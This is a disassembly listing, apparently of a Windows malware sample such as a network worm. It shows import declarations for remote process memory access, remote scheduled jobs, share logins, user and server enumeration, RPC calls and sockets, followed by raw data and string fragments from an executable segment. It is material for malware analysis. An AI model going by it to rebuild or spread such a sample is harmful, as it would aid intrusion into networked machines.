; LPVOID __stdcall VirtualAllocEx(HANDLE hProcess,LPVOID lpAddress,SIZE_T dwSize,DWORD flAllocationType,DWORD flProtect)
extrn VirtualAllocEx:dword ; CODE XREF: sub_9ACC9F+3D�p
; DATA XREF: sub_9ACC9F+3D�r
; HANDLE __stdcall OpenProcess(DWORD dwDesiredAccess,BOOL bInheritHandle,DWORD dwProcessId)
extrn OpenProcess:dword ; CODE XREF: sub_9ACC9F+1F�p
; sub_9ACEC5+35�p ...
; BOOL __stdcall ReadProcessMemory(HANDLE hProcess,LPCVOID lpBaseAddress,LPVOID lpBuffer,SIZE_T nSize,SIZE_T *lpNumberOfBytesRead)
extrn ReadProcessMemory:dword ; CODE XREF: sub_9ACE3B+27�p
; sub_9ACE3B+40�p ...
; BOOL __stdcall SetFileAttributesA(LPCSTR lpFileName,DWORD dwFileAttributes)
extrn SetFileAttributesA:dword ; CODE XREF: sub_9AD12D+2A�p
; DATA XREF: sub_9AD12D+2A�r
; DWORD __stdcall GetFileAttributesA(LPCSTR lpFileName)
extrn GetFileAttributesA:dword ; CODE XREF: sub_9AD12D+4�p
; DATA XREF: sub_9AD12D+4�r
; DWORD __stdcall GetCurrentDirectoryA(DWORD nBufferLength,LPSTR lpBuffer)
extrn GetCurrentDirectoryA:dword ; CODE XREF: sub_9AD279+2A�p
; DATA XREF: sub_9AD279+2A�r
; BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName,LPSTR lpCommandLine,LPSECURITY_ATTRIBUTES lpProcessAttributes,LPSECURITY_ATTRIBUTES lpThreadAttributes,BOOL bInheritHandles,DWORD dwCreationFlags,LPVOID lpEnvironment,LPCSTR lpCurrentDirectory,LPSTARTUPINFOA lpStartupInfo,LPPROCESS_INFORMATION lpProcessInformation)
extrn CreateProcessA:dword ; CODE XREF: sub_9AD3A7+4E�p
; DATA XREF: sub_9AD3A7+4E�r
; LONG __stdcall InterlockedCompareExchange(volatile LONG *Destination,LONG Exchange,LONG Comperand)
extrn InterlockedCompareExchange:dword ; CODE XREF: sub_9AD553+9�p
; sub_9AD569+1C�p
; DATA XREF: ...
; LONG __stdcall InterlockedDecrement(volatile LONG *lpAddend)
extrn InterlockedDecrement:dword ; CODE XREF: sub_9AD6D4+14D�p
; sub_9AD8BC+115�p ...
; LONG __stdcall InterlockedIncrement(volatile LONG *lpAddend)
extrn InterlockedIncrement:dword ; CODE XREF: sub_9AD6D4+14�p
; sub_9AD8BC+17�p ...
; BOOL __stdcall SetEvent(HANDLE hEvent)
extrn SetEvent:dword ; CODE XREF: sub_9ADBF1+45D�p
; sub_9ADBF1+4D7�p
; DATA XREF: ...
; HANDLE __stdcall CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes,BOOL bManualReset,BOOL bInitialState,LPCSTR lpName)
extrn CreateEventA:dword ; CODE XREF: sub_9ADA44+BE�p
; sub_9ADBF1+B8�p ...
; LONG __stdcall InterlockedExchange(volatile LONG *Target,LONG Value)
extrn InterlockedExchange:dword ; CODE XREF: sub_9AD831+41�p
; sub_9ADB83+4B�p ...
;
; Imports from mpr.dll
;
; DWORD __stdcall WNetAddConnection2W(LPNETRESOURCEW lpNetResource,LPCWSTR lpPassword,LPCWSTR lpUserName,DWORD dwFlags)
extrn __imp_WNetAddConnection2W:dword ; DATA XREF: WNetAddConnection2W�r
; DWORD __stdcall WNetAddConnection2A(LPNETRESOURCEA lpNetResource,LPCSTR lpPassword,LPCSTR lpUserName,DWORD dwFlags)
extrn __imp_WNetAddConnection2A:dword ; DATA XREF: WNetAddConnection2A�r
; DWORD __stdcall WNetCancelConnection2A(LPCSTR lpName,DWORD dwFlags,BOOL fForce)
extrn __imp_WNetCancelConnection2A:dword
; DATA XREF: WNetCancelConnection2A�r
; DWORD __stdcall WNetCancelConnection2W(LPCWSTR lpName,DWORD dwFlags,BOOL fForce)
extrn __imp_WNetCancelConnection2W:dword
; DATA XREF: WNetCancelConnection2W�r
;
; Imports from msvcrt.dll
;
extrn __imp__initterm:dword ; DATA XREF: _initterm�r
extrn _adjust_fdiv:dword ; DATA XREF: _CRT_INIT(x,x,x):loc_9B8377�r
; void *__cdecl calloc(size_t NumOfElements,size_t SizeOfElements)
extrn calloc:dword ; CODE XREF: sub_9B6663+45�p
; sub_9B679A+31�p ...
; int sscanf(const char *Src,const char *Format,...)
extrn sscanf:dword ; CODE XREF: sub_9B644D+DB�p
; sub_9B644D+125�p ...
; void *__cdecl memmove(void *Dst,const void *Src,size_t Size)
extrn memmove:dword ; CODE XREF: sub_9B04E9+34�p
; sub_9B3C6E+2A�p
; DATA XREF: ...
; void *__cdecl bsearch(const void *Key,const void *Base,size_t NumOfElements,size_t SizeOfElements,int (__cdecl *PtFuncCompare)(const void *,const void *))
extrn bsearch:dword ; CODE XREF: sub_9B00F5+34�p
; sub_9B00F5+5F�p ...
; __int32 __cdecl labs(__int32 X)
extrn __imp_labs:dword ; DATA XREF: labs�r
extrn __imp_sin:dword ; DATA XREF: sin�r
extrn __imp_log:dword ; DATA XREF: log�r
; char *__cdecl strtok(char *Str,const char *Delim)
extrn strtok:dword ; CODE XREF: sub_9AEBA1+41�p
; sub_9AEBA1+4F�p ...
; int __cdecl atoi(const char *Str)
extrn atoi:dword ; CODE XREF: sub_9AEBA1+5F�p
; sub_9AEBA1+C0�p
; DATA XREF: ...
; wchar_t *__cdecl wcsdup(const wchar_t *Str)
extrn _wcsdup:dword ; CODE XREF: sub_9A95EE+86�p
; sub_9AE195+16D�p ...
; int printf(const char *Format,...)
extrn printf:dword ; CODE XREF: sub_9ACC9F+14D�p
; DATA XREF: sub_9ACC9F+14D�r
; char *__cdecl strcpy(char *Dest,const char *Source)
extrn __imp_strcpy:dword ; DATA XREF: strcpy�r
; int __cdecl strcmp(const char *Str1,const char *Str2)
extrn __imp_strcmp:dword ; DATA XREF: strcmp�r
; char *__cdecl strcat(char *Dest,const char *Source)
extrn __imp_strcat:dword ; DATA XREF: strcat�r
; wchar_t *__cdecl wcsstr(const wchar_t *Str,const wchar_t *SubStr)
extrn wcsstr:dword ; CODE XREF: sub_9AAD09+25�p
; DATA XREF: sub_9AAD09+25�r
; char *__cdecl strlwr(char *Str)
extrn _strlwr:dword ; CODE XREF: sub_9AA463+6D�p
; sub_9AF52D+182�p ...
; char *__cdecl strstr(const char *Str,const char *SubStr)
extrn strstr:dword ; CODE XREF: sub_9AA463+84�p
; sub_9AF52D+196�p ...
; char *__cdecl strdup(const char *Src)
extrn _strdup:dword ; CODE XREF: sub_9AA0F1+26�p
; sub_9AB855+120�p ...
; wchar_t *__cdecl wcsncpy(wchar_t *Dest,const wchar_t *Source,size_t Count)
extrn wcsncpy:dword ; CODE XREF: sub_9A993B+37�p
; DATA XREF: sub_9A993B+37�r
; void *__cdecl malloc(size_t Size)
extrn malloc:dword ; CODE XREF: sub_9A96FE+98�p
; sub_9AA62A+4�p ...
; void __cdecl free(void *Memory)
extrn free:dword ; CODE XREF: sub_9A96FE+10F�p
; sub_9A96FE+165�p ...
; void *__cdecl realloc(void *Memory,size_t NewSize)
extrn realloc:dword ; CODE XREF: sub_9A95EE+56�p
; sub_9B2565+18�p ...
; wchar_t *__cdecl wcscat(wchar_t *Dest,const wchar_t *Source)
extrn wcscat:dword ; CODE XREF: sub_9A9318+95�p
; sub_9A9318+E2�p ...
; wchar_t *__cdecl wcscpy(wchar_t *Dest,const wchar_t *Source)
extrn wcscpy:dword ; CODE XREF: sub_9A9318+9F�p
; sub_9A96FE+A9�p ...
; int __cdecl wcscmp(const wchar_t *Str1,const wchar_t *Str2)
extrn wcscmp:dword ; CODE XREF: sub_9A9318+C8�p
; sub_9A9898+65�p
; DATA XREF: ...
; int snwprintf(wchar_t *Dest,size_t Count,const wchar_t *Format,...)
extrn _snwprintf:dword ; CODE XREF: sub_9A926F+1D�p
; sub_9A92AE+20�p ...
; size_t __cdecl wcslen(const wchar_t *Str)
extrn wcslen:dword ; CODE XREF: sub_9A8E01+A�p
; sub_9A96FE+81�p ...
; char *__cdecl strchr(const char *Str,int Val)
extrn strchr:dword ; CODE XREF: sub_9A8E01+D9�p
; sub_9AB855+12C�p ...
; void *__cdecl memset(void *Dst,int Val,size_t Size)
extrn __imp_memset:dword ; DATA XREF: memset�r
; void *__cdecl memcpy(void *Dst,const void *Src,size_t Size)
extrn __imp_memcpy:dword ; DATA XREF: memcpy�r
; int __cdecl memcmp(const void *Buf1,const void *Buf2,size_t Size)
extrn __imp_memcmp:dword ; DATA XREF: memcmp�r
; char *__cdecl strncat(char *Dest,const char *Source,size_t Count)
extrn strncat:dword ; CODE XREF: sub_9A7670+B4�p
; sub_9A7E49+33�p
; DATA XREF: ...
; void __cdecl srand(unsigned int Seed)
extrn srand:dword ; CODE XREF: sub_9A752A+17�p
; sub_9A798D+93�p ...
; int __cdecl rand()
extrn rand:dword ; CODE XREF: sub_9A752A+1D�p
; sub_9A7670+91�p ...
; int snprintf(char *Dest,size_t Count,const char *Format,...)
extrn _snprintf:dword ; CODE XREF: sub_9A752A+54�p
; sub_9A798D+CD�p ...
; char *__cdecl strncpy(char *Dest,const char *Source,size_t Count)
extrn strncpy:dword ; CODE XREF: sub_9A752A+118�p
; sub_9A8E01+C8�p ...
; char *__cdecl strrchr(const char *Str,int Ch)
extrn strrchr:dword ; CODE XREF: sub_9A7410+61�p
; sub_9A9D29+C�p ...
; int __cdecl strnicmp(const char *Str1,const char *Str,size_t MaxCount)
extrn _strnicmp:dword ; CODE XREF: sub_9A722A+5A�p
; sub_9A9D29+5C�p ...
; size_t __cdecl strlen(const char *Str)
extrn __imp_strlen:dword ; DATA XREF: strlen�r
; int __cdecl stricmp(const char *Str1,const char *Str2)
extrn _stricmp:dword ; CODE XREF: sub_9A722A+85�p
; sub_9AA18B+9A�p ...
; int __cdecl memicmp(const void *Buf1,const void *Buf2,size_t Size)
extrn _memicmp:dword ; CODE XREF: sub_9B5AC7+50�p
; sub_9B5AC7+74�p
; DATA XREF: ...
;
; Imports from netapi32.dll
;
; DWORD __stdcall NetApiBufferFree(LPVOID Buffer)
extrn __imp_NetApiBufferFree:dword ; DATA XREF: NetApiBufferFree�r
; DWORD __stdcall NetScheduleJobDel(LPCWSTR Servername,DWORD MinJobId,DWORD MaxJobId)
extrn __imp_NetScheduleJobDel:dword ; DATA XREF: NetScheduleJobDel�r
; DWORD __stdcall NetScheduleJobEnum(LPCWSTR Servername,LPBYTE *PointerToBuffer,DWORD PrefferedMaximumLength,LPDWORD EntriesRead,LPDWORD TotalEntries,LPDWORD ResumeHandle)
extrn __imp_NetScheduleJobEnum:dword ; DATA XREF: NetScheduleJobEnum�r
; DWORD __stdcall NetScheduleJobAdd(LPCWSTR Servername,LPBYTE Buffer,LPDWORD JobId)
extrn __imp_NetScheduleJobAdd:dword ; DATA XREF: NetScheduleJobAdd�r
; DWORD __stdcall NetUserEnum(LPCWSTR servername,DWORD level,DWORD filter,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,LPDWORD resume_handle)
extrn __imp_NetUserEnum:dword ; DATA XREF: NetUserEnum�r
; DWORD __stdcall NetServerEnum(LPCWSTR servername,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,DWORD servertype,LPCWSTR domain,LPDWORD resume_handle)
extrn __imp_NetServerEnum:dword ; DATA XREF: NetServerEnum�r
; DWORD __stdcall NetWkstaGetInfo(LPWSTR servername,DWORD level,LPBYTE *bufptr)
extrn __imp_NetWkstaGetInfo:dword ; DATA XREF: NetWkstaGetInfo�r
;
; Imports from oleaut32.dll
;
; UINT __stdcall SysStringLen(BSTR)
extrn SysStringLen:dword ; CODE XREF: sub_9A9ED0+B3�p
; DATA XREF: sub_9A9ED0+B3�r
; void __stdcall VariantInit(VARIANTARG *pvarg)
extrn VariantInit:dword ; CODE XREF: sub_9A9A64+5C�p
; DATA XREF: sub_9A9A64+5C�r
; void __stdcall SysFreeString(BSTR bstrString)
extrn SysFreeString:dword ; CODE XREF: sub_9A9ED0+E8�p
; DATA XREF: sub_9A9ED0+E8�r
; BSTR __stdcall SysAllocString(const OLECHAR *psz)
extrn SysAllocString:dword ; CODE XREF: sub_9A9ED0+AA�p
; DATA XREF: sub_9A9ED0+AA�r
; HRESULT __stdcall VariantClear(VARIANTARG *pvarg)
extrn VariantClear:dword ; CODE XREF: sub_9A9A64+175�p
; DATA XREF: sub_9A9A64+175�r
;
; Imports from rpcrt4.dll
;
; RPC_STATUS __stdcall RpcBindingFromStringBindingA(RPC_CSTR StringBinding,RPC_BINDING_HANDLE *Binding)
extrn RpcBindingFromStringBindingA:dword ; CODE XREF: sub_9AA799+37�p
; sub_9AA82D+3A�p
; DATA XREF: ...
; RPC_STATUS __stdcall RpcStringBindingComposeA(RPC_CSTR ObjUuid,RPC_CSTR ProtSeq,RPC_CSTR NetworkAddr,RPC_CSTR Endpoint,RPC_CSTR Options,RPC_CSTR *StringBinding)
extrn RpcStringBindingComposeA:dword ; CODE XREF: sub_9AA799+25�p
; sub_9AA82D+28�p
; DATA XREF: ...
; CLIENT_CALL_RETURN NdrClientCall2(PMIDL_STUB_DESC pStubDescriptor,PFORMAT_STRING pFormat,...)
extrn __imp_NdrClientCall2:dword ; DATA XREF: NdrClientCall2�r
; RPC_STATUS __stdcall RpcBindingFree(RPC_BINDING_HANDLE *Binding)
extrn RpcBindingFree:dword ; CODE XREF: sub_9AA799+85�p
; sub_9AA82D+AD�p
; DATA XREF: ...
;
; Imports from shell32.dll
;
; void __stdcall SHGetSetSettings(LPSHELLSTATEA lpss,DWORD dwMask,BOOL bSet)
extrn SHGetSetSettings:dword ; CODE XREF: sub_9AC1ED+3D�p
; DATA XREF: sub_9AC1ED+3D�r
; BOOL __stdcall SHGetSpecialFolderPathA(HWND hwnd,LPSTR pszPath,int csidl,BOOL fCreate)
extrn SHGetSpecialFolderPathA:dword ; CODE XREF: sub_9A7670+8F�p
; sub_9A7670+DE�p
; DATA XREF: ...
;
; Imports from shlwapi.dll
;
; LPSTR __stdcall StrStrIA(LPCSTR lpFirst,LPCSTR lpSrch)
extrn StrStrIA:dword ; CODE XREF: sub_9A7410+83�p
; sub_9A7410+95�p ...
; LPWSTR __stdcall StrStrIW(LPCWSTR lpFirst,LPCWSTR lpSrch)
extrn StrStrIW:dword ; CODE XREF: sub_9ACF3E+87�p
; DATA XREF: sub_9ACF3E+87�r
;
; Imports from user32.dll
;
; BOOL __stdcall GetLastInputInfo(PLASTINPUTINFO plii)
extrn GetLastInputInfo:dword ; CODE XREF: sub_9ADB83+2A�p
; DATA XREF: sub_9ADB83+2A�r
; BOOL __stdcall PostMessageA(HWND hWnd,UINT Msg,WPARAM wParam,LPARAM lParam)
extrn PostMessageA:dword ; CODE XREF: fn+1A�p
; DATA XREF: fn+1A�r
; HWND __stdcall GetDlgItem(HWND hDlg,int nIDDlgItem)
extrn GetDlgItem:dword ; CODE XREF: fn+6�p
; DATA XREF: fn+6�r
; int __stdcall LoadStringA(HINSTANCE hInstance,UINT uID,LPSTR lpBuffer,int cchBufferMax)
extrn LoadStringA:dword ; CODE XREF: sub_9AC2BE+29�p
; DATA XREF: sub_9AC2BE+29�r
; LRESULT __stdcall DefWindowProcA(HWND hWnd,UINT Msg,WPARAM wParam,LPARAM lParam)
extrn DefWindowProcA:dword ; DATA XREF: sub_9AC078+20�r
; LRESULT __stdcall DispatchMessageA(const MSG *lpMsg)
extrn DispatchMessageA:dword ; CODE XREF: sub_9AC09E+98�p
; DATA XREF: sub_9AC09E+98�r
; BOOL __stdcall TranslateMessage(const MSG *lpMsg)
extrn TranslateMessage:dword ; CODE XREF: sub_9AC09E+8E�p
; DATA XREF: sub_9AC09E+8E�r
; ATOM __stdcall RegisterClassA(const WNDCLASSA *lpWndClass)
extrn RegisterClassA:dword ; CODE XREF: sub_9AC09E+52�p
; DATA XREF: sub_9AC09E+52�r
; BOOL __stdcall EnumThreadWindows(DWORD dwThreadId,WNDENUMPROC lpfn,LPARAM lParam)
extrn EnumThreadWindows:dword ; CODE XREF: sub_9A9A29+1E�p
; DATA XREF: sub_9A9A29+1E�r
; BOOL __stdcall GetMessageA(LPMSG lpMsg,HWND hWnd,UINT wMsgFilterMin,UINT wMsgFilterMax)
extrn GetMessageA:dword ; CODE XREF: sub_9AC09E+A5�p
; DATA XREF: sub_9AC09E+7D�r
; HWND __stdcall CreateWindowExA(DWORD dwExStyle,LPCSTR lpClassName,LPCSTR lpWindowName,DWORD dwStyle,int X,int Y,int nWidth,int nHeight,HWND hWndParent,HMENU hMenu,HINSTANCE hInstance,LPVOID lpParam)
extrn CreateWindowExA:dword ; CODE XREF: sub_9AC09E+72�p
; DATA XREF: sub_9AC09E+72�r
;
; Imports from version.dll
;
; BOOL __stdcall GetFileVersionInfoA(LPCSTR lptstrFilename,DWORD dwHandle,DWORD dwLen,LPVOID lpData)
extrn __imp_GetFileVersionInfoA:dword ; DATA XREF: GetFileVersionInfoA�r
; BOOL __stdcall VerQueryValueA(LPCVOID pBlock,LPCSTR lpSubBlock,LPVOID *lplpBuffer,PUINT puLen)
extrn __imp_VerQueryValueA:dword ; DATA XREF: VerQueryValueA�r
; DWORD __stdcall GetFileVersionInfoSizeA(LPCSTR lptstrFilename,LPDWORD lpdwHandle)
extrn __imp_GetFileVersionInfoSizeA:dword
; DATA XREF: GetFileVersionInfoSizeA�r
;
; Imports from wininet.dll
;
; BOOL __stdcall InternetCloseHandle(HINTERNET hInternet)
extrn InternetCloseHandle:dword ; CODE XREF: sub_9ACAC1+133�p
; sub_9ACAC1+13C�p ...
; HINTERNET __stdcall InternetOpenA(LPCSTR lpszAgent,DWORD dwAccessType,LPCSTR lpszProxy,LPCSTR lpszProxyBypass,DWORD dwFlags)
extrn InternetOpenA:dword ; CODE XREF: sub_9ACAC1+5A�p
; sub_9AEAC6+4B�p
; DATA XREF: ...
; BOOL __stdcall InternetGetConnectedState(LPDWORD lpdwFlags,DWORD dwReserved)
extrn InternetGetConnectedState:dword ; CODE XREF: StartAddress+1C4�p
; sub_9AA572+25�p ...
; BOOL __stdcall InternetReadFile(HINTERNET hFile,LPVOID lpBuffer,DWORD dwNumberOfBytesToRead,LPDWORD lpdwNumberOfBytesRead)
extrn InternetReadFile:dword ; CODE XREF: sub_9ACAC1+11E�p
; DATA XREF: sub_9ACAC1+11E�r
; HINTERNET __stdcall InternetOpenUrlA(HINTERNET hInternet,LPCSTR lpszUrl,LPCSTR lpszHeaders,DWORD dwHeadersLength,DWORD dwFlags,DWORD dwContext)
extrn InternetOpenUrlA:dword ; CODE XREF: sub_9ACAC1+7B�p
; sub_9AEAC6+64�p
; DATA XREF: ...
; BOOL __stdcall HttpQueryInfoA(HINTERNET hRequest,DWORD dwInfoLevel,LPVOID lpBuffer,LPDWORD lpdwBufferLength,LPDWORD lpdwIndex)
extrn HttpQueryInfoA:dword ; CODE XREF: sub_9ACAC1+B0�p
; sub_9AEAC6+93�p ...
;
; Imports from ws2_32.dll
;
; SOCKET __stdcall accept(SOCKET s,struct sockaddr *addr,int *addrlen)
extrn accept:dword ; CODE XREF: sub_9AFD0A+110�p
; DATA XREF: sub_9AFD0A+110�r
; int __stdcall bind(SOCKET s,const struct sockaddr *name,int namelen)
extrn bind:dword ; CODE XREF: sub_9AFC25+A5�p
; sub_9B611D+D7�p
; DATA XREF: ...
; int __stdcall getsockname(SOCKET s,struct sockaddr *name,int *namelen)
extrn getsockname:dword ; CODE XREF: sub_9AF7D5+43�p
; sub_9B5139+9C�p
; DATA XREF: ...
; int __stdcall sendto(SOCKET s,const char *buf,int len,int flags,const struct sockaddr *to,int tolen)
extrn sendto:dword ; CODE XREF: sub_9B611D+12D�p
; DATA XREF: sub_9B611D+12D�r
; int __stdcall WSAStartup(WORD wVersionRequested,LPWSADATA lpWSAData)
extrn WSAStartup:dword ; CODE XREF: StartAddress+18A�p
; DATA XREF: StartAddress+18A�r
; int __stdcall setsockopt(SOCKET s,int level,int optname,const char *optval,int optlen)
extrn setsockopt:dword ; CODE XREF: sub_9B611D+A3�p
; sub_9B611D+CC�p
; DATA XREF: ...
; u_long __stdcall ntohl(u_long netlong)
extrn __imp_ntohl:dword ; CODE XREF: sub_9A9DA6+15�p
; sub_9AC416+BD�p
; DATA XREF: ...
; int __stdcall listen(SOCKET s,int backlog)
extrn listen:dword ; CODE XREF: sub_9AFD0A+99�p
; DATA XREF: sub_9AFD0A+99�r
; int __stdcall shutdown(SOCKET s,int how)
extrn shutdown:dword ; CODE XREF: sub_9AF52D+291�p
; sub_9AF7D5+42E�p
; DATA XREF: ...
; struct hostent *__stdcall gethostbyname(const char *name)
extrn gethostbyname:dword ; CODE XREF: sub_9AEE7C+8�p
; sub_9B5139+14�p
; DATA XREF: ...
; u_long __stdcall ntohl_0(u_long netlong)
extrn __imp_ntohl_0:dword ; DATA XREF: ntohl_0�r
; u_short __stdcall ntohs(u_short netshort)
extrn ntohs:dword ; CODE XREF: sub_9AC9D5+35�p
; sub_9AFC25+91�p ...
; int __stdcall connect(SOCKET s,const struct sockaddr *name,int namelen)
extrn connect:dword ; CODE XREF: sub_9AC9D5+5B�p
; sub_9B5139+7D�p ...
; int __stdcall WSAGetLastError()
extrn WSAGetLastError:dword ; CODE XREF: sub_9AC9D5+66�p
; DATA XREF: sub_9AC9D5+66�r
; int __stdcall send(SOCKET s,const char *buf,int len,int flags)
extrn send:dword ; CODE XREF: sub_9AC931+79�p
; sub_9B5139+F8�p ...
; int __stdcall select(int nfds,fd_set *readfds,fd_set *writefds,fd_set *exceptfds,const struct timeval *timeout)
extrn select:dword ; CODE XREF: sub_9AC864+4E�p
; sub_9AC931+50�p ...
; int __stdcall gethostname(char *name,int namelen)
extrn gethostname:dword ; CODE XREF: sub_9AA064+2F�p
; DATA XREF: sub_9AA064+2F�r
; char *__stdcall inet_ntoa(struct in_addr in)
extrn inet_ntoa:dword ; CODE XREF: sub_9AA0F1+1F�p
; sub_9AEE7C+19�p ...
; unsigned __int32 __stdcall inet_addr(const char *cp)
extrn __imp_inet_addr:dword ; CODE XREF: sub_9AA27B+76�p
; sub_9AA27B+81�p ...
; int __stdcall closesocket(SOCKET s)
extrn closesocket:dword ; CODE XREF: sub_9AC416+E7�p
; sub_9AF52D+29A�p ...
; int __stdcall WSAIoctl(SOCKET s,DWORD dwIoControlCode,LPVOID lpvInBuffer,DWORD cbInBuffer,LPVOID lpvOutBuffer,DWORD cbOutBuffer,LPDWORD lpcbBytesReturned,LPWSAOVERLAPPED lpOverlapped,LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine)
extrn WSAIoctl:dword ; CODE XREF: sub_9AC416+5D�p
; DATA XREF: sub_9AC416+5D�r
; int __stdcall __WSAFDIsSet(SOCKET fd,fd_set *)
extrn __imp___WSAFDIsSet:dword ; DATA XREF: __WSAFDIsSet�r
; int __stdcall ioctlsocket(SOCKET s,__int32 cmd,u_long *argp)
extrn ioctlsocket:dword ; CODE XREF: sub_9AC864+76�p
; sub_9AC9D5+52�p ...
; int __stdcall recv(SOCKET s,char *buf,int len,int flags)
extrn recv:dword ; CODE XREF: sub_9AC864+99�p
; sub_9B5CF9+63�p
; DATA XREF: ...
; void __stdcall WSASetLastError(int iError)
extrn WSASetLastError:dword ; CODE XREF: sub_9AC864+C0�p
; sub_9AC931+9C�p ...
; SOCKET __stdcall socket(int af,int type,int protocol)
extrn socket:dword ; CODE XREF: sub_9AC416+31�p
; sub_9AF52D+23�p ...
;
; Imports from ole32.dll
;
; HRESULT __stdcall CoInitializeSecurity(PSECURITY_DESCRIPTOR pSecDesc,LONG cAuthSvc,SOLE_AUTHENTICATION_SERVICE *asAuthSvc,void *pReserved1,DWORD dwAuthnLevel,DWORD dwImpLevel,void *pAuthList,DWORD dwCapabilities,void *pReserved3)
extrn CoInitializeSecurity:dword ; CODE XREF: sub_9A9C0D+31�p
; DATA XREF: sub_9A9C0D+31�r
; HRESULT __stdcall CoCreateInstance(const IID *const rclsid,LPUNKNOWN pUnkOuter,DWORD dwClsContext,const IID *const riid,LPVOID *ppv)
extrn CoCreateInstance:dword ; CODE XREF: sub_9A9C0D+4E�p
; sub_9A9DE7+23�p ...
; void __stdcall CoUninitialize()
extrn CoUninitialize:dword ; CODE XREF: sub_9A9C0D+84�p
; sub_9A9FDF+79�p
; DATA XREF: ...
; HRESULT __stdcall CoInitializeEx(LPVOID pvReserved,DWORD dwCoInit)
extrn CoInitializeEx:dword ; CODE XREF: sub_9A9C0D+11�p
; sub_9A9FDF+10�p
; DATA XREF: ...
;
; Imports from urlmon.dll
;
; HRESULT __stdcall ObtainUserAgentString(DWORD dwOption,LPSTR pszUAOut,DWORD *cbSize)
extrn __imp_ObtainUserAgentString:dword ; DATA XREF: ObtainUserAgentString�r
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 9A1438h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; char Name[]
Name dd 1000h, 2 dup(0) ; DATA XREF: sub_9A7170+8E�o
dd 1578h, 1000h, 10A4h
; char dword_9A1450[]
dword_9A1450 dd 2 dup(0) ; DATA XREF: sub_9A7170+53�o
dd 188Ch, 10A4h, 122Ch, 2 dup(0)
dd 1F68h, 122Ch, 1240h, 2 dup(0)
dd 1FD0h
; char dword_9A1484[]
dword_9A1484 dd 1240h, 12F0h, 2 dup(0) ; DATA XREF: sub_9A7170+4D�o
dd 218Ch
; char dword_9A1498
dword_9A1498 dd 12F0h, 1310h ; DATA XREF: sub_9A722A+73�o
; char Srch[]
Srch db 8 dup(0) ; DATA XREF: sub_9A7410:loc_9A7487�o
; sub_9A798D+105�o ...
dd 221Ch, 1310h
; char dword_9A14B0[]
dword_9A14B0 dd 1328h, 2 dup(0) ; DATA XREF: sub_9A74E1:loc_9A7506�o
; sub_9AD417+5�o
dd 227Ah
; const WCHAR dword_9A14C0
dword_9A14C0 dd 1328h, 133Ch, 2 dup(0) ; DATA XREF: sub_9A74E1+2�o
dd 22E6h, 133Ch, 1348h, 2 dup(0)
dd 2320h, 1348h, 1354h
; char CommandLine[]
CommandLine dd 2 dup(0) ; DATA XREF: sub_9A752A+132�o
dd 2344h, 1354h, 1384h, 2 dup(0)
dd 2410h, 1384h, 1394h, 2 dup(0)
dd 245Eh
; char aF[]
aF db '”' ; DATA XREF: sub_9A752A+47�o
db 13h, 2 dup(0)
dd 13B0h, 0
dword_9A1530 dd 0 ; DATA XREF: sub_9A7670+A6�o
dd 24E6h, 13B0h, 141Ch
; char Source[]
Source db 8 dup(0) ; DATA XREF: sub_9A7670+9D�o
dd 2626h, 141Ch, 1430h
dword_9A1554 dd 2 dup(0) ; DATA XREF: StartAddress+165�o
; char ServiceName[]
ServiceName dd 2680h, 1430h, 0 ; DATA XREF: StartAddress:loc_9A78E4�o
dword_9A1568 dd 4 dup(0) ; DATA XREF: sub_9A798D:loc_9A7B64�o
dd 61766461h, 32336970h, 6C6C642Eh, 0
aRegopenkeyexw db 'RegOpenKeyExW',0 ; DATA XREF: sub_9A798D:loc_9A7B4F�o
align 4
dd 53676552h, 654B7465h
; char aYsecurity[]
aYsecurity db 'ySecurity',0 ; DATA XREF: sub_9A798D+1A8�o
; sub_9AB59B:loc_9AB59E�o
align 4
dd 6E65704Fh
; char Format[]
Format db 'SCManagerW',0 ; DATA XREF: sub_9A798D+C6�o
aU_0 db 'u',0
align 2
dw 6E45h
; char aUmservicesstat[]
aUmservicesstat db 'umServicesStatusW',0 ; DATA XREF: sub_9A798D+44�o
align 4
dd 6E65704Fh
aServicew db 'ServiceW',0 ; DATA XREF: sub_9A812E+6E�o
align 4
aQueryserviceco db 'QueryServiceConfigW',0
dd 75510000h, 53797265h, 69767265h, 6F436563h, 6769666Eh
dd 5732h, 6D490000h, 73726570h, 74616E6Fh, 676F4C65h, 4F646567h
dd 6573556Eh, 72h, 74696E49h, 696C6169h, 6553657Ah, 69727563h
dd 65447974h, 69726373h, 726F7470h, 6F00h, 4C746547h, 74676E65h
dd 64695368h, 0
aInitializeacl db 'InitializeAcl',0
align 4
aAddaccessallow db 'AddAccessAllowedAce',0
dd 65530000h, 63655374h, 74697275h, 73654479h, 70697263h
dd 44726F74h, 6C6361h, 65530000h, 6C694674h, 63655365h
dd 74697275h, 4179h, 6F4C0000h, 70756B6Fh, 76697250h, 67656C69h
dd 6C615665h, 416575h, 64410000h, 7473756Ah, 656B6F54h
dd 6972506Eh, 656C6976h, 736567h, 68430000h, 65676E61h
dd 76726553h, 43656369h, 69666E6Fh, 4167h, 65520000h, 74726576h
dd 65536F54h, 666Ch, 65520000h, 74655367h, 756C6156h, 41784565h
dd 0
aRegopenkeyexa db 'RegOpenKeyExA',0
align 4
aRegqueryvaluee db 'RegQueryValueExA',0
align 10h
aRegclosekey db 'RegCloseKey',0
dd 72430000h, 65746165h, 76726553h, 41656369h, 0
aStartservicea db 'StartServiceA',0
align 10h
aOpenscmanagera db 'OpenSCManagerA',0
align 10h
dd 704F0000h, 65536E65h, 63697672h, 4165h, 6C430000h, 5365736Fh
dd 69767265h, 61486563h, 656C646Eh, 0
aControlservice db 'ControlService',0
align 4
dd 65440000h, 6574656Ch, 76726553h, 656369h, 704F0000h
dd 72506E65h, 7365636Fh, 6B6F5473h, 6E65h, 65470000h, 6B6F5474h
dd 6E496E65h, 6D726F66h, 6F697461h, 6Eh, 6F6C6C41h, 65746163h
dd 49646E41h, 6974696Eh, 7A696C61h, 64695365h, 0
aEqualsid db 'EqualSid',0
aN db 'N',0
align 4
aFreesid db 'FreeSid',0
dd 65520000h, 756E4567h, 79654B6Dh, 577845h, 65520000h
